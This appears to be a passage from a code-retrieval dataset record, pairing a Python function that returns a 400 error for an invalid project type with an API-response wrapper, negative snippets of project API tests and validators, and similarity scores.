test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.inframe_cds_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq, in_frame=False), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq, in_frame=False), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequence(self):\n self.assertEqual([1, -3, 9, -27, 81, -243],\n [x for x in GeometricProgression(6, 1, -3)])\n\n self.assertEqual([1, 1, 1, 1, 1],\n [x for x in GeometricProgression(5, 1, 1)])\n\n self.assertEqual([4, 40, 400, 4000, 40000],\n [x for x in GeometricProgression(5, 4, 10)])", "def isSeq(act, resources):\n ok = True \n count = 0\n while (count < len(resources) and ok):\n ok = act.resources[count] <= resources[count]\n count += 1\n return ok", "def test_call(self):\r\n f = lambda id_, seq, qual: len(seq) > 3\r\n s1 = 'aa'\r\n s2 = 'aaaa'\r\n sq = SeqQualBad('Q', f)\r\n self.assertEqual(sq('x', s1, [1, 2, 3]), False)\r\n self.assertEqual(sq('y', s2, [1, 2, 3]), True)\r\n self.assertEqual(sq.FailedIds, ['y'])", "def test_03_visit_special(self):", "def test_02_visit_again(self):", "def testing():\n from random import randint\n algorithms = [dynamic_programming, patience_sort, lis]\n\n sequences = [[],\n [1, 2, 3, 4, 5],\n [5, 4, 3, 2, 1],\n [1, 1, 1, 1],\n [3, 2, 6, 4, 5, 1]]\n sequences.append([26, 65, 42, 18, 73, 73, 85, 13, 89, 79, 74, 84, 62, 72,\n 58])\n for alg in algorithms:\n for seq in sequences:\n if alg(seq) != trivial(seq):\n print((\"%s failed for sequence %s with value %i, \"\n \"but should have %i\") %\n (str(alg),\n str(seq),\n alg(seq),\n trivial(seq)))\n return \"Failure\"\n \"\"\"\n for i in range(100):\n seq = []\n # Dont set this too high, because trival has O(2^n) runtime!\n length = randint(1,20)\n for i in range(length):\n seq.append(randint(1,100))\n if alg(seq) != trivial(seq):\n print((\"%s failed for sequence %s with value %i, \"\n \"but should have %i\") %\n (str(alg),str(seq), alg(seq), trivial(seq)))\n return \"Failure\"\n \"\"\"", "def test_sequence_info(self):\n self.t(\"1,2 info\")\n code, out, err = self.t(\"_get 1.description 2.description\")\n self.assertEqual(out.count(\"miss\"), 2)", "async def test_check_segment_or_target(\n data_type, defined, missing, used, sequence_id, mongo\n):\n await asyncio.gather(\n mongo.otus.insert_one({\"_id\": \"foo\", \"schema\": [{\"name\": \"RNA1\"}]}),\n mongo.references.insert_one(\n {\"_id\": \"bar\", \"data_type\": data_type, \"targets\": [{\"name\": \"CPN60\"}]}\n ),\n mongo.sequences.insert_one(\n {\n \"_id\": \"boo\",\n \"otu_id\": \"foo\",\n \"isolate_id\": \"baz\",\n \"target\": \"CPN60\" if used else \"ITS2\",\n }\n ),\n )\n\n data = {}\n\n if data_type == \"barcode\":\n data[\"target\"] = \"CPN60\" if defined else \"ITS2\"\n else:\n data[\"segment\"] = \"RNA1\" if defined else \"RNA2\"\n\n if missing:\n data = {}\n\n message = await check_sequence_segment_or_target(\n mongo, \"foo\", \"baz\", sequence_id, \"bar\", data\n )\n\n # The only case where an error message should be returned for a genome-type\n # reference.\n if data_type == \"genome\" and not 
missing and not defined:\n assert message == \"Segment RNA2 is not defined for the parent OTU\"\n return\n\n if data_type == \"barcode\":\n if sequence_id is None and missing:\n assert message == \"The 'target' field is required for barcode references\"\n return\n\n if not missing and not defined:\n assert message == \"Target ITS2 is not defined for the parent reference\"\n return\n\n if sequence_id != \"boo\" and not missing and used and data_type == \"barcode\":\n assert message == \"Target CPN60 is already used in isolate baz\"\n return\n\n assert message is None", "def test_normal_basic():\r\n yield check_normal_basic, False\r\n yield check_normal_basic, False, True\r\n yield check_normal_basic, True", "def _check_items(cls, sequence):\n all([cls._check_item(x) for x in sequence])", "def testSeq(self, mock_gs):\n self.mr._sequences = ['apple', 'banana']\n\n self.assertEqual(\n 'apple',\n self.mr.seq\n )\n\n mock_gs.assert_called_once_with()\n mock_gs.reset_mock()\n\n self.mr._is_seq = False\n\n self.assertEqual(\n None,\n self.mr.seq\n )\n\n # Test that we pulled from the cache\n self.assertFalse(\n mock_gs.called\n )", "def test_uniform_basic():\r\n yield check_uniform_basic, False\r\n yield check_uniform_basic, False, True\r\n yield check_uniform_basic, True", "def testSeqs(self, mock_gs):\n self.mr._sequences = ['apple', 'banana']\n\n self.assertEqual(\n ['apple', 'banana'],\n self.mr.seqs\n )\n\n mock_gs.assert_called_once_with()\n mock_gs.reset_mock()\n\n self.mr._is_seq = False\n\n self.assertEqual(\n [],\n self.mr.seqs\n )\n\n # Test that we pulled from the cache\n self.assertFalse(\n mock_gs.called\n )", "def test_regap(self):\n sc = self.SequenceClass\n self.assertEqual(str(sc(\"TC\").regap(sc(\"A---A-\"))), \"T---C-\")", "def verifyFasta(head,seq,pred):\n\treturn True", "def test_available(self):\n feature_guard = _make_requires(True, \"Error text\")\n results = []\n\n @feature_guard\n def inner():\n results.append(True)\n return True\n\n assert inner() is True\n assert [True] == results", "def test_return_final_seq_user_input_valid():\n for valid_case in [True, False]:\n assert RNN(layers_info=[[\"gru\", 20], [\"lstm\", 8], [\"linear\", 7]],\n hidden_activations=\"relu\", initialiser=\"xavier\", return_final_seq_only=valid_case, input_dim=15)\n\n for invalid_case in [[True], 22, [1, 3], (True, False), (5, False)]:\n with pytest.raises(AssertionError):\n print(invalid_case)\n RNN(layers_info=[[\"gru\", 20], [\"lstm\", 8], [\"linear\", 7]],\n hidden_activations=\"relu\", initialiser=\"xavier\", return_final_seq_only=invalid_case, input_dim=15)" ]
[ "0.61842567", "0.61777836", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6158104", "0.61537033", "0.59816474", "0.59589577", "0.5941578", "0.59333587", "0.5928325", "0.5923485", "0.5907195", "0.5892558", "0.5870993", "0.5845033", "0.581714", "0.5807843", "0.57873607", "0.57797146", "0.57791287", "0.5776901", "0.57753307" ]
0.63319796
0
API returns a string and an HTTP Bad Request (400) is issued when the project type is not valid.
def invalid_project_tye_msg(proj_type):
    return {"error": f"Project type {proj_type} is not valid, please use one of the following: "
                     f"{', '.join(project_types)}"}, 400
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def api_response(project_type, result):\n if project_type not in project_types:\n return invalid_project_tye_msg(project_type)\n return result", "def bad_request():\n return HttpError(400)", "def bad_request(self, request, message):\n if request.META.get('CONTENT_TYPE') == 'application/vnd.api+json':\n content = {'errors': {'changeset': message}}\n return HttpResponseBadRequest(\n dumps(content), content_type='application/vnd.api+json')\n else:\n return HttpResponseBadRequest(message)", "def test_invalid_project_create(self):\n\n responses.add(\n responses.POST,\n self.host + \"/manager\",\n json={\n 'message': \"Project names must start with a letter, followed by any number of letters, digits, '-' or '_'.\",\n 'status': \"error\"\n },\n status=200\n )\n\n with self.assertRaises(CreateError):\n self.azk.create('123', 'description')", "def BadRequest(message):\n return f\"Bad Request: {message}\", 400", "def post(self):\n try:\n draft_project_dto = DraftProjectDTO(request.get_json())\n draft_project_dto.user_id = token_auth.current_user()\n draft_project_dto.validate()\n except DataError as e:\n current_app.logger.error(f\"error validating request: {str(e)}\")\n return {\"Error\": \"Unable to create project\", \"SubCode\": \"InvalidData\"}, 400\n\n try:\n draft_project_id = ProjectAdminService.create_draft_project(\n draft_project_dto\n )\n return {\"projectId\": draft_project_id}, 201\n except ProjectAdminServiceError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 403\n except (InvalidGeoJson, InvalidData) as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 400", "def test_invalid_locale_and_project(self):\n response = self.client.get('/invalid-locale/invalid-project/')\n assert_equal(response.status_code, 404)", "def bad_request(self, error):\n return jsonify({'error': 'BAD REQUEST'}), 400", "def bad_request_400(error):\n return jsonify({\n 'success': False,\n 'message': 'Bad request',\n 'error': 400\n }), 400", "def test_patch_project_type_change(self):\n url = reverse(\n 'projectroles:api_project_update',\n kwargs={'project': self.project.sodar_uuid},\n )\n patch_data = {'type': PROJECT_TYPE_CATEGORY}\n response = self.request_knox(url, method='PATCH', data=patch_data)\n self.assertEqual(response.status_code, 400, msg=response.content)", "def check_project_id(project_id):\n # Convert variable into a string\n project_id = str(project_id)\n # Replace Capital letters and spaces\n project_id = project_id.replace(\" \", \"-\").lower()\n\n # Throw an error if any known incorrect usages found\n try:\n if re.search(\"^-|[^a-z0-9-]|google|ssl|-$\", project_id):\n raise ValueError(\"Invalid characters or words in Project ID\")\n elif len(project_id) > 30:\n raise ValueError(\"Too many characters in Project ID\")\n elif len(project_id) < 6:\n raise ValueError(\"More Characters required in Project ID\")\n else:\n log.info(f\"Project Id {project_id} passed regex check\")\n project_outcome = {\n \"outcome\": True,\n \"project_id\": project_id\n }\n return project_outcome\n except ValueError as e:\n log.warning(f\"Proposed Id {project_id} violates known google policies: \"\n \"https://cloud.google.com/resource-manager/docs/creating-managing-projects\")\n project_outcome = {\n \"outcome\": False,\n \"project_id\": project_id\n }\n return project_outcome", "def __get_project_id(self):\n request = 
urllib2.Request(self.host_api+\"projects?owner=\"+urllib2.quote(self.owner)+\"&display_name=\"+urllib2.quote(self.project_name))\n # request = urllib2.Request(self.host_api+\"projects?owner=\"+self.owner+\"&display_name=Galaxy%20Zoo%20Bar%20Lengths\")\n # print hostapi+\"projects?owner=\"+owner+\"&display_name=\"+project_name\n request.add_header(\"Accept\",\"application/vnd.api+json; version=1\")\n request.add_header(\"Authorization\",\"Bearer \"+self.token)\n\n # request\n try:\n response = urllib2.urlopen(request)\n except urllib2.HTTPError as e:\n print self.host_api+\"projects?owner=\"+self.owner+\"&display_name=\"+self.project_name\n print 'The server couldn\\'t fulfill the request.'\n print 'Error code: ', e.code\n print 'Error response body: ', e.read()\n except urllib2.URLError as e:\n print 'We failed to reach a server.'\n print 'Reason: ', e.reason\n else:\n # everything is fine\n body = response.read()\n\n # put it in json structure and extract id\n data = json.loads(body)\n return data[\"projects\"][0][\"id\"]", "def _validate(self, project_id: str,\n project_creation_mode: workflow.ProjectCreationMode, s: str):\n if not (4 <= len(s) <= 30):\n raise ValueError(\n ('Invalid Google Cloud Platform project name \"{}\": '\n 'must be between 4 and 30 characters').format(s))\n\n if self._is_new_project(project_creation_mode):\n return\n\n assert project_id is not None\n\n project_name = self.project_client.get_project(project_id)['name']\n if project_name != s:\n raise ValueError('Wrong project name given for project id.')", "def test_returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/aoi/\")\n self.assertEqual(response.status_code, 404)", "def _validate(self, backend: str, active_account: str, project_id: str):\n\n if not re.match(r'[a-z][a-z0-9\\-]{5,29}', project_id):\n raise ValueError(\n ('Invalid Google Cloud Platform Project ID \"{}\": '\n 'must be between 6 and 30 characters and contain '\n 'lowercase letters, digits or hyphens').format(project_id))\n\n if not self.project_client.project_exists(project_id):\n raise ValueError('Project {} does not exist'.format(project_id))\n\n if not self._has_correct_permissions(backend, project_id,\n active_account):\n msg = 'User has incorrect permissions to deploy.'\n if backend == 'gae':\n msg = 'User must be a Project Owner to deploy on GAE'\n elif backend == 'gke':\n msg = ('User does not have correct permissions'\n 'to deploy on GKE')\n raise ValueError(msg)", "def test_create_project_request(self):\n pass", "def post(self, request, formal=None):\n serializers = ProjectSerializer(data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data, status=status.HTTP_201_CREATED)\n permission_classes=(IsAdminOrReadOnly)\n return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)", "def send_incorrect_json_bad_request():\n return make_response(jsonify({\"validation_error\": {\n \"error\": 'Syntax error',\n \"description\": 'Parsing of input JSON is unavailable'\n }}), 400)", "def internal_error_400(error):\n return jsonify({'error':\n \"Die Anfrage wurde syntaktisch falsch erstellt.\"}), 400", "def test_returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/summary/\")\n self.assertEqual(response.status_code, 404)", "def _PatchProjectReturnType(self):\n projects_method = registry.GetMethod('cloudresourcemanager.projects',\n 'list')\n self.StartObjectPatch(projects_method, 
'GetResponseType',\n return_value=ProjectsMessage)", "def _create_project(self):\n request = {\n \"project\": {\n \"description\": \"description\",\n \"enabled\": True,\n \"name\": uuid.uuid4().hex,\n \"domain_id\": \"default\",\n }\n }\n response = self.client.post(PROJECT_PATH, data=json.dumps(request),\n headers=HEADERS)\n\n if response.status_code == 201:\n return response.json()\n else:\n raise SystemExit(\"Failed to create project.\")", "def json_not_provided(err):\n current_app.logger.exception(err)\n return 'No JSON found with request', 400", "def test_get_project_id_from_name_missing_proj(self, mock_get):\n mock_get.side_effect = CharonError('Error', status_code=404)\n with self.assertRaises(ValueError):\n get_project_id_from_name(self.project_name)", "def test_create_projeto_fail(client, fake_login_superuser):\n response = client.post(\n \"/api/v1/projeto\",\n data={\n 'nome': 'Agronomia',\n 'descricao': \"Falta objetivo\"\n }\n )\n assert response.status_code == 422", "def test_request_membership_form_with_an_invalid_project_id(self):\n pass", "def test_retrieve_invalid_app_name(self):\n setting_name = 'project_str_setting'\n url = reverse(\n 'projectroles:api_project_setting_retrieve',\n kwargs={'project': self.project.sodar_uuid},\n )\n get_data = {\n 'app_name': 'NON-EXISTING-APP',\n 'setting_name': setting_name,\n }\n response = self.request_knox(url, data=get_data)\n self.assertEqual(response.status_code, 400, msg=response.content)", "def test_incorrect_type(self):\n body = json.dumps({\n \"first_name\": 200,\n \"last_name\": \"Holmes\",\n \"email\": \"[email protected]\",\n \"password\": \"ilovek@ndA!\"\n })\n\n errorObject = {\n \"error\": \"Bad request\",\n \"field_errors\": {\n \"first_name\": [\"Invalid field type\"]\n }\n }\n\n result = self.simulate_post('/', body=body, headers=headers)\n\n self.assertEqual(result.status_code, 400)\n self.assertEqual(result.json, errorObject)", "def bad_request(message):\n return error_response(400, message)", "def test_bad_param(self):\n url = '/%s/job-types/validation/' % self.api\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['name'] = None\n json_data = {\n 'manifest': manifest,\n 'configuration': self.configuration\n }\n\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n results = json.loads(response.content)\n self.assertFalse(results['is_valid'])\n self.assertEqual(len(results['errors']), 1)\n self.assertEqual(results['errors'][0]['name'], 'JSON_VALIDATION_ERROR')" ]
[ "0.70865583", "0.6068282", "0.59508896", "0.5887611", "0.58829206", "0.584176", "0.5705421", "0.56078774", "0.56074756", "0.5575878", "0.5568863", "0.55578727", "0.555444", "0.5553019", "0.5551587", "0.5527737", "0.5523695", "0.5515269", "0.55109483", "0.54840106", "0.54434466", "0.54334056", "0.5415354", "0.5409887", "0.5395762", "0.539235", "0.5382481", "0.5381129", "0.5372594", "0.5367218" ]
0.7925061
0
Wrapper to return the desired API response only if the specified project type is valid.
def api_response(project_type, result):
    if project_type not in project_types:
        return invalid_project_tye_msg(project_type)
    return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_project_or_study(obj_type, obj_id):\n \n response = None\n\n try:\n if obj_type not in set([\"projects\", \"studies\"]):\n raise Exception(\"Invalid object type specified\")\n\n files_d = {}\n files_d.update(file_dict[obj_type][\"valid\"])\n files_d.update(file_dict[obj_type][\"invalid\"])\n\n if obj_id in files_d.keys():\n json_file = data_dir + files_d[obj_id]\n if os.path.exists(json_file):\n response = get_response(open(json_file, \"r\").read())\n else:\n response = get_response(not_found_json, status=404)\n else:\n if obj_id == \"NA\": # endpoint not implemented simulation,\n # return 501 instead of 404\n response = get_response(not_found_json, status=501)\n else: \n response = get_response(not_found_json, status=404)\n\n except Exception as e:\n response_body = '''{\"message\": \"invalid resource '%s'\"}''' % obj_type\n response = get_response(response_body, status=400)\n \n return response", "def invalid_project_tye_msg(proj_type):\n return {\"error\": f\"Project type {proj_type} is not valid, please use one of the following: \"\n f\"{', '.join(project_types)}\"}, 400", "def test_returns_projects_filter_by_mapping_types(self):\n # Arrange\n self.test_project_1.mapping_types = [MappingTypes.BUILDINGS.value]\n self.test_project_1.save()\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.mapping_types = [MappingTypes.ROADS.value]\n self.test_project_2.private = False\n self.test_project_2.save()\n # Set mapping type of test_project_3 to waterways.\n self.test_project_3.mapping_types = [MappingTypes.WATERWAYS.value]\n self.test_project_3.status = ProjectStatus.PUBLISHED.value\n self.test_project_3.save()\n # Create a new project with other mapping type.\n\n test_project_4 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id, self.test_author.id, [MappingTypes.LAND_USE.value]\n )\n # Create a new project with land use mapping type.\n test_project_5 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id, self.test_author.id, [MappingTypes.OTHER.value]\n )\n # Create a new project with all mapping types.\n test_project_6 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id,\n self.test_author.id,\n [\n MappingTypes.BUILDINGS.value,\n MappingTypes.ROADS.value,\n MappingTypes.WATERWAYS.value,\n MappingTypes.LAND_USE.value,\n MappingTypes.OTHER.value,\n ],\n )\n\n # Act\n response_buildings = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.BUILDINGS.name]},\n )\n # Assert\n self.assertEqual(response_buildings.status_code, 200)\n self.assertEqual(len(response_buildings.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_buildings.json[\"results\"]],\n [self.test_project_1.id, test_project_6.id],\n )\n\n # Act\n response_roads = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.ROADS.name]},\n )\n # Assert\n self.assertEqual(response_roads.status_code, 200)\n self.assertEqual(len(response_roads.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_roads.json[\"results\"]],\n [self.test_project_2.id, test_project_6.id],\n )\n\n # Act\n response_waterways = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.WATERWAYS.name]},\n )\n # 
Assert\n self.assertEqual(response_waterways.status_code, 200)\n self.assertEqual(len(response_waterways.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_waterways.json[\"results\"]],\n [self.test_project_3.id, test_project_6.id],\n )\n\n # Act\n response_land_use = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.LAND_USE.name]},\n )\n # Assert\n self.assertEqual(response_land_use.status_code, 200)\n self.assertEqual(len(response_land_use.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_land_use.json[\"results\"]],\n [test_project_4.id, test_project_6.id],\n )\n\n # Act\n response_other = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.OTHER.name]},\n )\n # Assert\n self.assertEqual(response_other.status_code, 200)\n self.assertEqual(len(response_other.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_other.json[\"results\"]],\n [test_project_5.id, test_project_6.id],\n )\n\n # Test filter by multiple mapping types returns projects with any of the mapping types in the list.\n # Act\n response_all = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": \"BUILDINGS,ROADS,WATERWAYS,LAND_USE,OTHER\"},\n )\n # Assert\n self.assertEqual(response_all.status_code, 200)\n self.assertEqual(len(response_all.json[\"results\"]), 6)\n\n # Test mappingTypesExact returns only projects with exact mapping types.\n # Act\n response_exact = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": \"BUILDINGS\", \"mappingTypesExact\": \"true\"},\n )\n # Assert\n self.assertEqual(response_exact.status_code, 200)\n self.assertEqual(len(response_exact.json[\"results\"]), 1)\n self.assertEqual(\n response_exact.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def search_project_or_study(obj_type):\n\n matches = []\n response = None\n\n try:\n if obj_type not in set([\"projects\", \"studies\"]):\n raise Exception(\"Invalid object type specified\")\n\n possible_filters = filters_d[obj_type]\n \n for f in file_dict[obj_type][\"valid\"].values():\n json_file = data_dir + f\n json_s = open(json_file, \"r\").read()\n json_obj = json.loads(json_s)\n add_to_matches = True\n\n for filter_name in possible_filters:\n filter_val = request.args.get(filter_name)\n if filter_val:\n if json_obj[filter_name] != filter_val:\n add_to_matches = False\n \n if add_to_matches:\n matches.append(json_s)\n\n response_body = \"[\" + \",\".join(matches) + \"]\"\n response = get_response(response_body, status=200)\n\n except Exception as e:\n print(\"bad request\")\n response_body = '''{\"message\": \"invalid resource '%s'\"}''' % obj_type\n response = get_response(response_body, status=400)\n\n return response", "def test_get_project(self):\n url = reverse(\n 'projectroles:api_project_retrieve',\n kwargs={'project': self.project.sodar_uuid},\n )\n response = self.request_knox(url)\n\n self.assertEqual(response.status_code, 200)\n response_data = json.loads(response.content)\n expected = {\n 'title': self.project.title,\n 'type': self.project.type,\n 'parent': str(self.category.sodar_uuid),\n 'description': self.project.description,\n 'readme': '',\n 'public_guest_access': False,\n 'archive': False,\n 'roles': {\n 
str(self.owner_as_cat.sodar_uuid): {\n 'user': self.get_serialized_user(self.user_owner_cat),\n 'role': PROJECT_ROLE_OWNER,\n 'inherited': True,\n 'sodar_uuid': str(self.owner_as_cat.sodar_uuid),\n },\n str(self.owner_as.sodar_uuid): {\n 'user': self.get_serialized_user(self.user_owner),\n 'role': PROJECT_ROLE_OWNER,\n 'inherited': False,\n 'sodar_uuid': str(self.owner_as.sodar_uuid),\n },\n },\n 'sodar_uuid': str(self.project.sodar_uuid),\n }\n self.assertEqual(response_data, expected)", "def test_returns_moderate_projects_if_difficulty_set_to_moderate(self):\n # Arrange\n self.test_project_2.private = False\n # Change difficulty of test_project_2 to easy so that it is not returned.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"MODERATE\"},\n )\n # User is only permitted to map test_project_1 and test_project_2, since test_project_3 is DRAFT.\n # So we should get only test_project_1 as it is the only project with difficulty set to MODERATE.\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def test_returns_all_projects_that_user_is_permitted_if_action_set_to_any(self):\n # Arrange\n self.test_project_2.private = False\n # Since test_author is BEGINNER, they can only map projects with mapping permission ANY.\n self.test_project_1.mapping_permission = MappingPermission.ANY.value\n self.test_project_1.save()\n self.test_project_2.mapping_permission = MappingPermission.ANY.value\n self.test_project_2.save()\n # Archive test_project_2 so that it is not returned if action set to any.\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.ARCHIVED.value\n # Validate all tasks of test_project_2 to check finished projects are not returned if action set to any.\n MappingService.map_all_tasks(self.test_project_2.id, self.test_author.id)\n ValidatorService.validate_all_tasks(self.test_project_2.id, self.test_author.id)\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"action\": \"any\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 2)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )\n self.assertEqual(\n response.json[\"results\"][1][\"projectId\"], self.test_project_2.id\n )", "def test_returns_projects_with_tasks_to_validate_if_action_set_to_validate(self):\n # Arrange\n self.test_project_2.private = False\n # Since test_author is BEGINNER, they can only validate projects with validation permission ANY.\n self.test_project_1.validation_permission = ValidationPermission.ANY.value\n self.test_project_1.save()\n self.test_project_2.validation_permission = ValidationPermission.ANY.value\n self.test_project_2.save()\n # Reset all tasks of test_project_2 so that there are no tasks ready to validate.\n MappingService.map_all_tasks(self.test_project_2.id, self.test_author.id)\n ValidatorService.validate_all_tasks(self.test_project_2.id, self.test_author.id)\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"action\": \"validate\"},\n )\n # Assert\n 
self.assertEqual(response.status_code, 200)\n # Test_project_2 has no tasks to validate, it should not be returned even when user has permsiion to validate.\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def test_projects_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_project_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project',\n json=expected_response,\n status=200\n )\n resp = requests.get(f'{os.environ[\"AIVEN_API_URL\"]}/v1/project')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n assert responses.calls[0].request.url == f'{os.environ[\"AIVEN_API_URL\"]}/v1/project'\n assert \"MY-PROJECT-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def _PatchProjectReturnType(self):\n projects_method = registry.GetMethod('cloudresourcemanager.projects',\n 'list')\n self.StartObjectPatch(projects_method, 'GetResponseType',\n return_value=ProjectsMessage)", "def test_org_unit_types_retrieve_without_auth_or_app_id(self):\n\n response = self.client.get(f\"/api/orgunittypes/{self.org_unit_type_1.id}/\")\n self.assertJSONResponse(response, 404)", "def test_returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/aoi/\")\n self.assertEqual(response.status_code, 404)", "def is_project_in_the_response(projectComponent, response):\n for project in response:\n if response[project] == projectComponent:\n return True\n return False", "def test_patch_project_type_change(self):\n url = reverse(\n 'projectroles:api_project_update',\n kwargs={'project': self.project.sodar_uuid},\n )\n patch_data = {'type': PROJECT_TYPE_CATEGORY}\n response = self.request_knox(url, method='PATCH', data=patch_data)\n self.assertEqual(response.status_code, 400, msg=response.content)", "def test_get(self):\n url = reverse('projectroles:api_project_list')\n response = self.request_knox(url)\n\n # Assert response\n self.assertEqual(response.status_code, 200)\n response_data = json.loads(response.content)\n self.assertEqual(len(response_data), 2)\n expected = [\n {\n 'title': self.category.title,\n 'type': self.category.type,\n 'parent': None,\n 'description': self.category.description,\n 'readme': '',\n 'public_guest_access': False,\n 'archive': False,\n 'roles': {\n str(self.owner_as_cat.sodar_uuid): {\n 'user': self.get_serialized_user(self.user_owner_cat),\n 'role': PROJECT_ROLE_OWNER,\n 'inherited': False,\n 'sodar_uuid': str(self.owner_as_cat.sodar_uuid),\n }\n },\n 'sodar_uuid': str(self.category.sodar_uuid),\n },\n {\n 'title': self.project.title,\n 'type': self.project.type,\n 'parent': str(self.category.sodar_uuid),\n 'description': self.project.description,\n 'readme': '',\n 'public_guest_access': False,\n 'archive': False,\n 'roles': {\n str(self.owner_as_cat.sodar_uuid): {\n 'user': self.get_serialized_user(self.user_owner_cat),\n 'role': PROJECT_ROLE_OWNER,\n 'inherited': True,\n 'sodar_uuid': str(self.owner_as_cat.sodar_uuid),\n },\n str(self.owner_as.sodar_uuid): {\n 'user': self.get_serialized_user(self.user_owner),\n 'role': PROJECT_ROLE_OWNER,\n 'inherited': False,\n 'sodar_uuid': str(self.owner_as.sodar_uuid),\n },\n },\n 'sodar_uuid': str(self.project.sodar_uuid),\n },\n ]\n 
self.assertEqual(response_data, expected)", "def handle(conn, method, addr, data):\n\tif (addr == \"/api/project\") or addr.startswith(\"/api/project/\"):\n\t\treturn handleApiProject(conn, method, addr, data)\n\tif addr == \"/api/projectsCount\":\n\t\treturn handleApiProjectsCount(conn, method, addr, data)\n\tif (addr == \"/api/getProject\") or addr.startswith(\"/api/getProject?\"):\n\t\treturn handleApiGetProject(conn, method, addr, data)\n\tif (addr == \"/api/getProjects\") or addr.startswith(\"/api/getProjects?\"):\n\t\treturn handleApiGetProjects(conn, method, addr, data)\n\tif addr == \"/api/getProjectsCount\":\n\t\treturn handleApiGetProjectsCount(conn, method, addr, data)\n\tif (addr == \"/api/getProjectCard\") or addr.startswith(\"/api/getProjectCard?\"):\n\t\treturn handleApiGetProjectCard(conn, method, addr, data)\n\tif addr == \"/api/getProject\":\n\t\tcore.sendAnswer(conn, \"400 Bad Request\")\n\t\treturn True\n\treturn False", "def rest_api_request_handler(self, request_type):\n result = {}\n success_code = 0\n with self.resource_lock:\n if request_type == self.RestRequest.REST_MUTS:\n result = self.muts # Returns MUTs\n elif request_type == self.RestRequest.REST_TEST_SPEC:\n result = self.test_spec # Returns Test Specification\n elif request_type == self.RestRequest.REST_TEST_RESULTS:\n pass # Returns test results\n else:\n success_code = -1\n return json.dumps(self.get_rest_result_template(result, 'request/' + request_type, success_code), indent=4)", "def test_get_status_no_project(\n get_internal_project: MagicMock,\n step_writer_serialize: MagicMock,\n):\n get_internal_project.return_value = None\n\n response = statuses.get_status(0, force=True)\n\n assert response['success'], \"\"\"\n Expect the status process to be successful.\n \"\"\"\n assert response['data']['project'] is None, \"\"\"\n 